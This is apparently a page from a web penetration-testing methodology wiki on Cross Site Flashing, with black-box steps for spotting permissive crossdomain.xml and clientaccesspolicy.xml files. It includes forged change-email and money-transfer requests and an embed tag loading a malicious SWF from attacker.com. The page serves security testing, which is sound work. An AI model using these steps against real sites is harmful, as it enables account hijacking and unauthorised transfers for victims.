search

Cross Site Flashing

hashtag
Check List

hashtag
Methodology

hashtag
Black Box

hashtag
CSRF via Flash (crossdomain.xml Misconfiguration)

1

Identify presence of Flash object on the application

2

Browse application and locate embedded SWF file

GET /static/upload.swf HTTP/1.1
Host: target.com
3

Check for Flash cross-domain policy file

GET /crossdomain.xml HTTP/1.1
Host: target.com
4

If response contains permissive policy

<cross-domain-policy>
  <allow-access-from domain="*" />
</cross-domain-policy>
5

Then any external domain can interact with the application via Flash, then Login to your account and Intercept a sensitive request (example: change email)

POST /account/change-email HTTP/1.1
Host: target.com
Cookie: session=abc123
Content-Type: application/x-www-form-urlencoded

email=attacker@test.com
6

Create a malicious SWF file that performs a POST request to the sensitive endpoint using victim’s cookies

7

Host malicious SWF on attacker-controlled domain

8

Embed malicious SWF inside attacker page

<object data="http://attacker.com/malicious.swf"></object>
9

Open attacker page while authenticated to target.com, If email is changed without CSRF token validation and Flash request is accepted due to permissive crossdomain.xml, Cross Site Flashing vulnerability is confirmed

hashtag
Socket Policy Misconfiguration

1

Check for socket policy file

GET /clientaccesspolicy.xml HTTP/1.1
Host: target.com
2

If response contains wildcard access

<access-policy>
  <cross-domain-access>
    <policy>
      <allow-from http-request-headers="*" domain="*" />
      <grant-to>
        <resource path="/" include-subpaths="true"/>
      </grant-to>
    </policy>
  </cross-domain-access>
</access-policy>
3

Then cross-domain Flash socket access is allowed, Develop proof-of-concept SWF that sends authenticated POST request to

POST /api/transfer HTTP/1.1
Host: target.com
Cookie: session=abc123
Content-Type: application/json

{"amount":1000,"to":"attacker"}
4

Host SWF externally, Victim visits attacker page while logged in

5

If transaction executes without additional server-side validation, Flash-based request forgery is possible

6

If authenticated state-changing requests can be triggered cross-domain via Flash, Cross Site Flashing vulnerability is confirmed

hashtag
White Box

hashtag
Cheat Sheet

PreviousClient Side Template InjectionNextClickjacking

Last updated